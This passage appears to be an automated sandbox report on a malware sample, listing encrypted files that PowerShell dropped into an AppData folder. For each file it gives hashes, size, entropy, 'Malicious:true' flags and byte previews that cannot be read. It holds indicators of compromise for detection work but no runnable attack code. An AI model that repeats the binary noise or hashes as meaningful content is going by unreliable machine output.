                                                                                                    Preview: ..H. ...w.8..f.......g....F...j9..Q.k. ;..%....y.X....{n.{O.._...E...cn...C.... a......r..5%?R'.N.Q.&.).O7..k..D.sL.f.. .V.Y......g)...H..FO.m..8..4.....F+....jJN.T..;`.........L1.2.J.5.W....8A...T..`.....4x..E.7....T........}%.Dw..^.RXk.#@..oS.....t...->.....R...;....m.}.B.z.|$L.......0p_bqDl.3.......!../.>.]y.F.....[ ..Q.A9-T...ddZ.....0....S7....II.....G..j.q.Y.....P".;....(...v;..*..p..*..C.1....b7..'*e.Bm...."...E$.M{(..A.@..~........Sf}8.......M=}.^eGP#+..[.In.tH:Te....Ot...l1..U7@n.Q...J...._....`u...t.W**.--..4.Q..W..}x.......o\...m9/a7..R.V.-l..7.hGb...[.x.....$#tm... ]a+...r.\.l.._..{.p...G.a.....PG...$.....UP.w....Ba.....1.yr.....^.+V.Q.....DA.....+D....V. .V40.e.]F....GkH.8......UFq.+...gx3.p/.e.=v}...P.S;W`&j.L...1.}..V....... ...!(..;A....'.3&......;-..w.5....@]...1.....5..]..t.D....K('k.,...i#Y..{...=.V.^qk....&l*.Z..........9p..t..$...0.....".......q.{.U..P.7.k.L..G..e.@..Z...@..L...S./.........w.[.1+.q..-i...~WI%.9.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LrfdcACiFNqYpuDs.jMOiZnLTJKldseRp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86971
                                                                                                    Entropy (8bit):7.997806654711631
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:jM/AtAUZZt+Ru7lUMCci7oGHmMfjbtkro4D0NMlsDoMNRtva56XlvY:jM/0AUZaRelfPcLHm9NbCDoMNv26Xy
                                                                                                    MD5:7164ADAC108672E62B07910B4A02C241
                                                                                                    SHA1:B08F72E826CC38750D7F0E575FABF60E465B5D39
                                                                                                    SHA-256:EF0F357C9DA4BA06685A0DC27497CCC8958507FFA407A13FCEC3F19C0852751A
                                                                                                    SHA-512:1215CFD8660C13CDDFED7A9F7A8AA59083DC5C8C6960E6F6E306DCC1CD6B4BB30C024E9A0773A5A6273BC544C18DCE9DB985427B2408366129186242A6EA332A
                                                                                                    Malicious:true
                                                                                                    Preview: ld50...].D...J.w.[.e..}Bj?.v.8..$.1g"{r!\.cf.....S&.6`...B.o.t-..nw....D.........}`..{Jt[8....86..I."r...2...7.R.....,.)....2..r..l.n..OgH3_..W.K.Ai....s......kO..g.....y..;.!..w.U>.{NKu@.d.I..I.:\j.Ua...$8h...Lu)-.P...n..9.`DGG.g......+.*....aW...4.D.U.w.... ..w?.)O.$..a...~...}i.G8oVe.|.J"...$aw..|UQ....1.&p...0.?..*.`u.F.ggX.eYR..{...J.#.H...hgR..~.f...g=Hw?...1.]A..,..6V..z...>...Q..GUJ..By. z]...2BRt..s...AWv.(.c...*c!.H.fbO.1.....:wB.*P].K.x.Y.}<,...1|.......o..s.(hL....W.|D..8......y..2.n....D.T<...\G/.....o.|/....i...a=w..8.I.J..^......g...^.'.........a<...%.2..V....y..@....../.2../..c..]j...wt....#LA.H?S:..k..t:....T..2`r.*.|.....h.S#........M.9....vp...|.........*.|......V.&.k.8.=..ojV".c...s.N.._w...w.....nv.....F&.`m<....;.r.1..@.9..V0....[.0_.S.Q..;......,.=.[W.;m...&.....J....,.\#p*Vz..w\........B....../.p..]......Bx.........?.H^...G..'.....o.+.TMg.)r.fT..4.1.c..v...Qz...l....UZ....[..a.g...MV.h...eP...<d>GN..5.....^..z..Z.q
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LuXjgMAUnYZmoxRvp.zcLpVkReTBiDx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):87434
                                                                                                    Entropy (8bit):7.998022036844658
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:yRheaWrrcSVtogq9B2LtaDLxCD3VJkq49LxQ8r3ISrUuTtMMfm1tMTqp:IheaQDdgoLkMpuxQ8MuKr1H
                                                                                                    MD5:922A61754CDDEBD91220CF1B201FD0BA
                                                                                                    SHA1:8C23288CFACA2CC8881367F00E99E25813122C9D
                                                                                                    SHA-256:5340A91E4218DCED9739750F26D152E919641F4582835258B95D865EEABCE52D
                                                                                                    SHA-512:3F0C672FA9137085621313A0BF64664F26054AB95C6A730FFA7EED6B8BF7393FBC67E3E41E51FC3B8834CDD926C29E47A286DA28921207D0F630D80AFE0C59CB
                                                                                                    Malicious:true
                                                                                                    Preview: xo..)..L..".....@.C1....k.ph...0Z..{,...(b..Pq..|...*........iCm$@.....R*.Z.I.T;$@9/..a;..D...T....h.3P.p.A.....`.0.....%.g.'...E+..F..P. .E.:....$.V..M...j;..i.....Gb]..3..h.......C..;.........P.3...7\.iDf..2.~z..w.....e..-I..\...~..U.U.2.7.d3..&..)..5.^=. x[..\...O,....5.%..*&...2......5~..KV.3.U.H*t.5.l9...Qw*.zN.C5.....S......:.8v{...&[?,_.Z.=....ab.$u..i..e...!x....x.m@ja..*..%.mCQ...S.q...8-9..oL.......?....h..4....%..f...P....N.7x.......h/.i....G..&..M..<.B1<.s..<....u.2.7.&#.....k..~A.n.f.+pv..HRin.m.Sf.']..=,......c.j%.@zg.]LS.......].+s.....u.n......._...O..._.....@.8.Yv......O....N......#...&d....U.(..F...f..IkxM.[cY.g........j......?.>.L..D.Y[vP.l...cP.1R...Q.......g....N_..a.0]...3...i..,.Wj...6...."\......!C..e....A..{9...~.......1..wp'j...t.....6W...A..&!....m.T.AomT{.&6.k......1w.:5...I.gk.4.KyX......^.lL.ul..W.....V..u..D.c.6]b...r%.n#........_......%.....>....(..>2..@6.%.D.QA.VQ 7..7.U..._....!.~/.....<...gh*/...E7...P
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LyNkQoObcYpGBvaK.CIRkbJFwWdEaj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):125030
                                                                                                    Entropy (8bit):7.998526751615263
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:8fMPifWgn2Ig0/KehhnNGeLgBukUC26iy9SAhGfV:1YZn2IgKOqJmvREfV
                                                                                                    MD5:D47C84A075FD199EA68EAF70AFCDD8F7
                                                                                                    SHA1:DE9BF8D6CC5D26405BA5EEE2C323BA853D094779
                                                                                                    SHA-256:CF405665AF703E9754B9A0F408C7C7F3B907E8F79289E5ACB791EAC19B5DABBD
                                                                                                    SHA-512:0253F285E3BA1E78B8AD662910C10F6366F5F5B62814A8B4FBC712E7E3DCF189B7B9A2C7FDE3A9504D95878DFA879153B3497F58B0B8A4F762B31E60C20E5E02
                                                                                                    Malicious:true
                                                                                                    Preview: ...H..a.{H.5U..!......5.P..|..-<.$....L...Q..`.y7..-... .q...A..>.(..h..'J..]..YS.?..)...C.,.Ho..y.Ns.X...3..Oj...t6....i?4....;._..6Xd")m..T.....e*qz.7.~ks:6@....eap.R......*.[.6..v.......6.:\.E.[....d..0..@...M..h......Z../..r..'.9..J.........u9[...x.3G..c..[p..s.........F....<'....k.8..\Z1..g..k..."Z:...&...4.....W].~..fw...%uq............g.......^..._...*5..-.sA.....T..Mx....5)q.0../.....`X9S!..]..;...mc*Xa}c..C=0...f+.4.. ....,.|a...R~~(qX..\.......LH%M..Q.?.N.h..<.....G.y..A*..:7........e.[.I.d...o@.Y"...mP........-......5q$.IW..?.{A.........uU..|.V..x..c..g....L_D...9..LE.....U.,..............cZ.]../.+..g..^.m...Y...s.0.d;(.A.N?.n..i...D.c....7........o%.%V... .....C......d$..|0..~D.f@..\...mBo..F.. _IX...?5..../.L$..Foq&.-!.U.5d.v...Tk".Z'....,?..!..."...K.8^>.'X.......Hf..^.u>u..e..2..%.o..+..0g.h..i...o...J.rtL..R...}Z.?{.!D......-...*a3.3.S.<K+.Z..........1...!./X....E.`.......t8j.M.I.."..\.{..s..5K..3?^...Q..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MEwsSeXUYrxJmdkRBW.bVSjvmysqIx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):126880
                                                                                                    Entropy (8bit):7.998724930562255
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:szwKHRADjg0RwtFVncXfkd+NiYj3tO6HmuGgvmQHM:5DrsfnZYj3tOGNKN
                                                                                                    MD5:0636C8216F07B64E014966E7EE033E8E
                                                                                                    SHA1:9C7E3FCA5EBD8C90A8A02A17E990F9B9FD53C412
                                                                                                    SHA-256:980C8C0007A133E578D5E57BEEFC51C88E36BD459E8B2587CF70F9F63F472ED3
                                                                                                    SHA-512:AFAE5BEA0A4941AEAC4DE38D602CB0189BCEF521FF975B33F2615096B8D4E28780B1F742B193DC9DD005AFE6EC793AD5405D58C39079430E855F01613E4953DB
                                                                                                    Malicious:true
                                                                                                    Preview: p.q.;...Y.k....4..Zb....t.f....-....l.r...C.Yn[..U.3kU.....Lb.%.u.v...r.....U.PHi,...!..+.HQb3p.mg...#b......c...\....w......+.*.....$...%.I.ss.V..X^!.Q.. KbW..... .S....R.H.7J....W..5.l.......Up..=Jg.....Y.....U.%O.^.RG.i..q..J.D..G-..#a"C...q.J..Xq. IIZ....?.'.d..!.q..%A....'6...4L.|..v.B....%..l`.......w......O.F.NS.fi.<.>.... ..lF.sp[...Wr..w...Sa.m.9........:..p.c....;{Y=..`..h.."I....O.)j....7...n...k.B...<|.V*.....xX..d..h".......u...o.P...a.M.{...PYH...x.,j..]h.[;.F..E...a....V...qz-C4...#0...^...zM...C..|7.Dx...x.D-..u.."...\C...WZf6..........h......].. ....6Z.....W....w.IY..H../..y~.........\.m.y4.....p.G*O.......3.;|8..s..Nb..T..F..D..H.AhF.."..E.W.....Z.....ip......I4...-..+.;...z.....i.[sI|.o....U.....L.>.T.m.l...@._V3.:f.Q....u4....vB.+f...ozq........6~";..f9.}b.1..*...{... L.>....@?..b.0.....Y.'rn.:6......4..Hi....:iMr.....y...K.H.(.F~Pk...<8h0>.4..........L.7d..........>!i.^a:!.a^$6q|.ha..zQ#...)}.@....BIJ.B..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MNEcQaHKpDeryAWB.jctmgixrqodyPfQZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88457
                                                                                                    Entropy (8bit):7.9981008713732376
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:HSAGIteP+cNvT77mgvvHFLuOTAyG3J0wlTn+A6w2wYm+Qjz:yv4edvLlfFaOkJrn5i7PQv
                                                                                                    MD5:F6BCA2A7DB40E2E4DFF9AA1AC38D686A
                                                                                                    SHA1:12963CD5665B85A35C55E90E2FB1F2CE07144463
                                                                                                    SHA-256:922583164AB90A1EC880E0E1406E36A0056F61FA99D458CA53C6D389C0E61059
                                                                                                    SHA-512:679A0CCFCD9B64E76128664EAFAE208061FB96BC23DD9F6B07797ECDCD7664483ACE1968C96DA84C301D62EAB826BAA22F184CC5831C51BE54FB5161583166F9
                                                                                                    Malicious:true
                                                                                                    Preview: s.3.2.Eq.1...p....M..+..U.I..;.l.H.r...:.....'...t4...H..........F'.>*..Mp...-AGdH..L.....=..F...s5.,.....".......'..Y#b..*..L.:......'C.}".?..r 8s%........L#b$z...R.....!7_.B.8...2.Q|Mx..!..Z...... %.s..tx.D..e9EO.fIC..L.....x...6.......j.#@{.o..Z._F.......x:..F..2..;........#C6..)..Z....".5..{...;........U..X........&...j+f.N..Cq.NP.`....X...s......>A...C.H..(..o;...Q.@..R."8...\.R.:..L..:.s....a(...:.".|. .6.l..9.5)..P.r.M[?.i...%b'...7....[.8.)..p79.......<.<.BGi.!............+^ y.q.+P.B.......?g.iRF_.......&.Y.......9.U.i@.$s....2@.$....A.n.:.....v.^0K.p..Yw.dM.a..q2.YNO...u......W%.j.-..:83 ..0.`.G....-..4.t.CI...0....r.......Q|-.:g.=.2.U....*=X..v.....@C.v:."..v.L..R.....v...G..M..%.d.]........so.m.q..c.XC......|P+..4W..K.....@V.j...M..W.....%h`#C..9Z......M...u:...'.y...[.~..h.L.1@.,..@..-.JF.. ."b...&0GA..N..D.xxB1..w....~...G.*.&.d.......S*...lD..{....U..W...`..r.r....d.a.T|.;.i....lr.p.Qq[.Z...~Y.+i...+...L..........A.Vs.C..n.#..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MRczxHTYNfB.KlZHRUacLAQTkqdz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77628
                                                                                                    Entropy (8bit):7.997285296866579
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:hnuNMvuULeq95xrsXpm27lB/8sRKR5frMbyhg3G8xYS2TnrOX7VwIqv2ksEt:huNM2Uiq95tsXpm27n/8xR5fb2WnXOaf
                                                                                                    MD5:C6CF3AC5862B1F0212DB08D19D240602
                                                                                                    SHA1:8BF329D08DB653C6D8CD8BD0B92EB6685FA6CED1
                                                                                                    SHA-256:5A789DA7F5A24B3812DAE8EF701DEAEEA9F66E341AA62BBC71B69041DACAFDFA
                                                                                                    SHA-512:E8FEA07BD3C865F9A6144DE015B2786943688EAC1C606AC671662AE7C0D99FF0A09CC6445E75A0CEB1EBDBF2E44A7C8929FDF663F15AFFF1830D9898808DFDCB
                                                                                                    Malicious:true
                                                                                                    Preview: T....]...]]....Q.#-..Vclf...dS.....`;..$.A.1..?E~....[.C.F...P,....Xy. ..1...r...G....O.....{t.../%Oz..;).}..j......T{e..)iH..&Q.............M.b..</C...P....,......"...8...IN.q...o$....(.\...W.Zc..mmY.-..B..<.Qjf.F.k!.{..C.......-qT;w...4|.....:`cO......wa.O..y.Qv..*|{...y..)..X.S6..hcu.j_a|...fB.%6..R>....N...6B._.w..}.)Xp....H.3zmb....F....kv..|.m\s.i.)...v.........k..}}................$.......\.....D..3;.2.....@/.....xwE...^A..xe[.....RS..Y*.~..l~..3.#`.`sp.H.`.C._9.:V$f....M..L.p..#{4.h...]@..Bw:..C....m.*.......V......wAUAv...gmPg........UJ..a!...V.eq'ew...-.,[..h.o....|-'>.U.lR....E..t;...M..m.. ...0...>9...XC.."s.*..../.h...OL8..p@Q.B;Hw...{d8.H1.$.i....h..pt|B..R...QD...I.k....I...t..l.hs.y............-.....iZ3Q..E.?...A.|....A..H.Qi.^#..du ..1.:...F..[7...^.....3.'...F.\!n...d...Nc4..w.G.wT.9Y..e.....dQ:..G..%..v.....8...0......P.)T...Q....}..O.u.}.%`...4.R......../.F....R..2$.KW..?A......MI...1.....~.|2..]..Q,.Vp.....H.}....o.d...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MagEIVHxsBdRNjp.NwflVaJYmxekzGrXL
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111143
                                                                                                    Entropy (8bit):7.998002015170403
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:c2yY0e2ixhyedQlOpDkMBXMLexPI5o/FhCx:VN2ixhulOpDrXAOPooNE
                                                                                                    MD5:AEDD578082F46BB1CD21EF50D933C052
                                                                                                    SHA1:4AF5A285F75270A837DEAB46F1C3FDCE2627BD33
                                                                                                    SHA-256:27DB578F73287A1E509E92E7D608B3DF5EC3E89E363C3D54BB4611F9A2FA2F52
                                                                                                    SHA-512:94D71242E6E31131B54A68813FF4544412727067B114777F7A3489EB1C81E4543DD4E2F9D6FAE9D9B6210DA4CF6DA208664490ACB2C3237CD60E07480D6B1C7D
                                                                                                    Malicious:true
                                                                                                    Preview: .>..%R.+..N/..:Z.*_. 8..V.....!.Yu.u..^.#S.J.....D.M.^./....4.^6.s.V....Y.....*t.R.n..E.a0!M....oj.+...I.Yk..7...kgx..7T.pT.\.x..^QIFO.%.y.4..?._...`..Y.;gJ....r.Zv.\B.&...0.Ml.b....U...0.|G.I.G.*"......q..B....W..b!...R.]@&YtjdA.p..Cd.#....L*...nN"...V.Jk..3O.g....!..$H..........c...N.....Ke....L.7.h:."p<.R.{9..2.....r!.Bt......N{r.E..|..> .j....y.R.......*...N..CE.w.{.L4.....,..E..|.b....08+c......)u.....i.#eu...b............~..........z...BZ?y....t.to.C#....pa..J......GP7.T.;9.g@.....Jm.....R.m./..%..-....Ex..y/NS....t..1e...k.B.4..e.._NT.q#.......6.......k=J6..s.../...v*....c...._&.........;.x..u..!.y.....O..:.4G..6h.`m.7.&Q....>.u....]..(.N.!...Fw...d..:......Y..;#....D..!.s.....\..!~.`..o.R+....i.GF .....<$.v..k=.^..."......*..d...Ye...uJ..|`U......$J.1".....k.I..>..D....y.]3.....G.(B....P.<2.{wB..,.v..v.oz......J.....:T~F..."..{...C..+v.u...-.[.V.....b..-9.../.r..MQ...b.......S.....5....lY....=... .d..v.q./j.a..f..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MedJtTXhGrZjWzbSCwc.ueBoDFHWjxvkwtgQlJS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:MPEG-4 LOAS, 4 or more streams, 8 or more streams
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146417
                                                                                                    Entropy (8bit):7.998824977667268
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EaXSBu16nmSV5EWKJYmuy1z1Xn9AbhTKMRluC9kqLdXEb:SBS6Z5EW1muMhWdTKMRluQRUb
                                                                                                    MD5:28A3A52BDE578B686C90CFD2B7B4D0B6
                                                                                                    SHA1:B0DB1D43C9CFBD34342E99312ADC33136E04A1F7
                                                                                                    SHA-256:D4DFE32F836D0C013CDD975786BE668887782C17AA20951A5D3CC11AE68BBED7
                                                                                                    SHA-512:F31FD300208F3D6D1C4720089DB02E0B1FB9B1265F43DBE06FCB5C3E907FC79D7A3C71DF10FB2FF25817ABC86B75A5145909C49DB0A3F64CB578ADB84E40BF90
                                                                                                    Malicious:true
                                                                                                    Preview: V.E#.%..g4#d....]V..M.oT........J..A.d....m.../f:.R....@....z..E..a.f.K...D6..)..h.._...`kC]%..e'..[M..w_.=..............,.C...4T..J....<f~..Vb<.-...~... .Hp.r.u...3.F...lZ].;....YI]....J...p.uI.[..q..'..g.j.Hh......j6y..;..f..0U<..rG6p~ ...+t..2A.m../.......+...w.Y..y.....C.3..d.1.C`J.i -C.....2=P..X..#U.#.s...[."c.....K......Z.L.`w.,..o....D......&.S.b.&.X.+0....-..C.'..I.\..j.".....P....uf..m..I....^....#cb......N.F.0X......{......UH.A<.O@bY..r`....[....c8..I.Ct."......@.D.+..W........v7..<G....t.T..........q....vv..)A.?.v....G<..r.....<-.R..K..n..*g...q"...u....\._c...{Ze.=.3V....O..e.".n..-..%...=......k..x..b...i...d...W.R.-.G0...K..%.6.#U&aUEv.7.F....3%".PN..}...>....o4ug.S..v:.zu.yb...Hw....7.TZ.6.a..3.....,C/....y.c.&..m...`......n..4.2..fT........;"...CI.8..?w..t.J...v.>X...B..0..s..h.h{v..&..Fv.v!%.)...n7sgX......y.IS.JB1;.u.['"...J(.0..U..)..~.......A.qU.v.1....D..' .K..6..yg~]sO8.Rj.dI-n..$<.....m.......k`.Z.....G..+...........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MjVTXQPhYeBZrGqmbyx.AEZcBgUzIlGaLhdNRMD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):161228
                                                                                                    Entropy (8bit):7.9988301899998975
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:jSP0+RXbIlV0UgiDYE0FGg+6C8rI64KE+mhYYNTcxku0Ar/jZy0bI4c8eHbSR:23Xb6WFcYap64L+mhD9zITVykIw0U
                                                                                                    MD5:7A3B4183842C592239A18CFA7D26D462
                                                                                                    SHA1:CF7469F176475526A9E5F23972AA33386F1279D9
                                                                                                    SHA-256:21EB41B900295E008E50CB71FCEB57C46C87E11C911D43E37DBC96A622C7B5D4
                                                                                                    SHA-512:740D0E6FBAF64E5F91F0754A240E5E625579CD8B712A097C79C1EDE2B9552B8333D6CA3C1732678DEE3AFA9F9DBC6854CB7A7E2E0A94C7B06DDA3A0A166B94E6
                                                                                                    Malicious:true
                                                                                                    Preview: u#.to81.C.U..P..=N........z{.-]..\..k^..d.-..n....zgM.....m.Y'i.y..t.a.........G.p..F..o..ii.,...B.n...:..z....!C...-...:..............*....T.......Z..H..5.7..p.UW.L....^q.P^.!..n....C..;.q..$...U .n....A..`......e..W...b..U.kK@.....p...~.h ....G~W....j78C.....G......+..At...I_..p.Q.nb8.S.`.SFC5m.9...cm..._.....!iw`.......C!>.n=O&cJ.k.|Q}.A./.^2....W.....Y...%ZR.<..|.P.......a.W...z..1"V...b..!\>.X..^.7...s.E...Z..[.>K..X.|....".A{.:.CN..J..._..|..........J..y".J.i...Ot.9....Z7.G...3..4..W~...n.E..F..P.Y.\>F...i.o....]....;.Y......1}...S..j.......&WX...|.(...>n.<2....<.&....x....R.g)N....t.._....~....Xs.ll......BH..o.M+h......u..S.6....&....6.t."8,.)dx...uom..hc...aA.IPQ..:h.RL.H...\..yiO5....f.Q....'..{.D.. @...}pt.p.?............3.h.y*R5w2..E...).Z.B!..(..B..}~&............u....".g}.[{Q~..o.......9..<n{Z.....*G.....D.t.@N.W.p.W..D.?.+.u;Vt....(...u.m..:...$...[.........b...t./.r...m*..#=@Q..dC...gbG...d..0.x...".y......Z.v.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MsbYozWAJjl.JjkUaLCloqZWPyRrV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137186
                                                                                                    Entropy (8bit):7.998581256633021
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BojikVojaWqiSRIuBSyqo3MVFqMl16l+mY9vtwaobYGLz5Wr82N8w:OVojafRIuBio3cgMnv/8b535WrlR
                                                                                                    MD5:24DB63543894197B1409B3CC902087F1
                                                                                                    SHA1:22B4619E1C264EB8A656332822237DCD6694427E
                                                                                                    SHA-256:18B5EB43F6399B223648AEA1BE73B27EF2386F30972F072AA292CA71455B34FC
                                                                                                    SHA-512:96C34B28717C9C3723E559A2E3FDF409EB6101D7AA3618A1E0203CA49E5E2ED660A3BF982DB97299FE490E4D1681D1BE59B354B98690DDBCBA25F7CB59BB42BA
                                                                                                    Malicious:true
                                                                                                    Preview: ..R..|..B....pj..,.....".\..:o"A..'.6:bs.k.2Z.M*.b..Z...0f..h..~D..I........[.Tva.z_'.*.u.....W.....I.h.@...{.....n..d........P.Z..dD.y4...w.|.{g.0D.Q78.n.?.'5..j@.v\[.Z...q.%...Wj.H.r.,.Tq..~...i<:...;.(..H.G...q....J...d\?Cq...L.l]..e....>....nI.P...[S.U........G..:.-.....B..5st..\..s...x~.$A)...r~.."...=..r.W..4..Qp.di.}z..h-Y...e.....6./..&.....7,....m.B=`Yt.s...A..[hi.:51V....!U....l...n....L`.....h}k.;...........QA..-..!.C!...E..\U#1...D....rz..4$.P....p.......i.-...NR.#/......m..j..&.s....e...M......W..........d\/$.....8.G....:{../...-...w.;Gq..(.Ryv... ....&..D4N...8........,...cBH[`...t.P...=r...@.......6.Vi........o..p...Pk.....>DN.oe..*..."Jm.a".....O..<.I.etK^..r.NN..v;.\.......@...P).Bn.....[k../#....6.x..wS.s.s..%.Pl..*.pQv0.S.....<....O..h#!......;.(.y..#O.W{..o2.....uN...$.&.eX..e-..`^q..."_.eQ.Y.VK.w.s<yS(a."........'.b../.~`U.......T#......[L1...$9P.3DZ....%!.ZWN.h.......R&c2...2..a...+I(....`..[4D....J..4V..T6.2...JX.v
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MvdjTgbEaNoiscGDqtn.WONSgaonGDEziy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97419
                                                                                                    Entropy (8bit):7.99829208498736
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:aIcMYqf7sL6XFmJYzFdxNnWetWjEgbQBML7l67O2ZnoPx33RnwBcW2P/uE34lyVI:qMYGsaFmJ+DsTFg7DopHHuc/JLlW
                                                                                                    MD5:25186E8F24A2E349BE7F5722D8AD3C6D
                                                                                                    SHA1:A42A3114DD41C29174677CB4AC0C2ACEDCC62BE1
                                                                                                    SHA-256:FD413392F01F7BCE9C0749F6853EDD8FE1576AA0BE60B3C843946F18BACED19F
                                                                                                    SHA-512:5E9B4906139C69692B9136E8837AB1E9434BC6674E97B80728099DE11A53DED16ECAFA38B3307C03C6926E1C6CCC4A8922E72CA622D7460717FA297F8D458285
                                                                                                    Malicious:true
                                                                                                    Preview: .L\D.....U..Z;E.\...b.mG.E).....RT.....L,:.B....J.\@^..7@f..>.7....k..99.q3..7e?..7F+..u..|..E.fk..{@hS"*.om..uI...T..{..d.5..9....Ae...k....t...T.zm..%.#.7.Zh.5fYt..3..L......./.....z.B..........!.}!..t...9E.8.v.B.[d..@0sO..W.V....Ax....&...e.r...\.0.=....?.W.*.5T@.U..K.Z..ct.|.P....`.V.cw.~.;4=.....e.......OCf.VL.0.....g......%.d._xV..K^..49...b.......b...v.k.;..{..8..S..#w..."...Rzy"6.>.U.}...`.~.g@.=~.;MXhH2...Y...E..6.JM..7.=-E...;....-_"......>9L....0.Y. ...?........*.K'<...S....l..Hs.^Hn|T..%_8..6........i.....F2..}rZ/R....k...4..FH...}....G....|...}^.s...S....D..I....:......-.m.....[..J.f...A..T.. C.........vY..*.EE.p.j....S.gQ...\p.M.N..x.P.@x~f.Z..%#.wa.Tj.....z....M.......|....O.a8....VI.......z.....1..^.y..vFr...a.\.Y.........m.Z.>.f....~u..@......1.z.u.^./...W.x..~.4.@...@...l..?u(..;..!.d7..P..1.........5...8....Kfc.-.........w"E.7..4.......oV=KG.V.....F.r....SD^.....vy9.~......._.!..). *..>..*..H0*.o2.4\...W...S=....xL..KU.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MzQXnKpVhcwFJ.MjcskRTKCtFdzU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77266
                                                                                                    Entropy (8bit):7.997333995660756
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:1b1m27QcvkI0+Ju91JWN2SLbHnxlEPmaE+BYp3GiKopxBmVyjKSX4hXYdQ:vm27QcZ0QCJd4MmCA25AmVyGPhodQ
                                                                                                    MD5:B3B4ADFA0530BF6F3366803CED46F25B
                                                                                                    SHA1:68FA1CF38781BEA80E059D88E8DDF2791CCC679C
                                                                                                    SHA-256:E0283AF512F23ECAF9FC282040A423EDC812CF38AC29E08260764E8144728FDC
                                                                                                    SHA-512:28DBBE0E38139135E673B57824F49ECD83292312A1C723E26AC3B406B39230FD0C8D222501267E63D1DF012BE1BE9A0B3EDA6B192C614DEAEB953ADFA0796615
                                                                                                    Malicious:true
                                                                                                    Preview: {..).Q..&.;.(v*.s..J..........uZ....`.&.6l.'.........b}...k.HpX%....#.."..q.. ,M......n.D/..#b.[...Y.nJmy..B..Jk......>.......Y....s.b.Y.h...j,-P4(.>F;.o@..z<hzL.,o!..y6ON.6z.u.....kV.........>..y..O...8.<......T].....nW.O.{.c..C4GA......Fk,.gj.V.A..y.2.......<d\z.....9..*..|y..x..._..:..m.3.....Y4D.]..v..@|V.......b`~...z..).3.?#.`.,..Y...-;.i.w....I^...H.,.L..j.w.v.*.I.D....!.;.TD.#.\....g....H...}..~I.%..yz.NB.u.....K^[.8.... ..S...7..Dp..:p.[......#l........w...)........^c53....6..U.Q.............o[..V.kZ..zA.P....c...:............`.<7.J.H?M9..Fi.<..=U.....P.4.>B.x..,..;..C.+.V...n.o.5}z....O.A...7.$!.d........b#....nI...(...:....L~..^...D.,*...W.^sMY<(.{...i..m.C.........yk-.9.cB.$.#.Cp./....<x-....DIX...;f./.=+...0...=3.a.........}..u.[....... ........i......h..o..CQ.>$|3u..?u........q~....XUnzZ.V._g..T..*.I{....F.. ....p.. rR.\6.J..%...T.S8...z4.,5..]!g.y{......l.I....}MN7./...?c&-...(..}..9.2a..."....0.I....T....a.~...{.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NUuwnlhMdTb.LDJtiwjYkGKSH
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):102084
                                                                                                    Entropy (8bit):7.998199508107113
                                                                                                    Encrypted:true
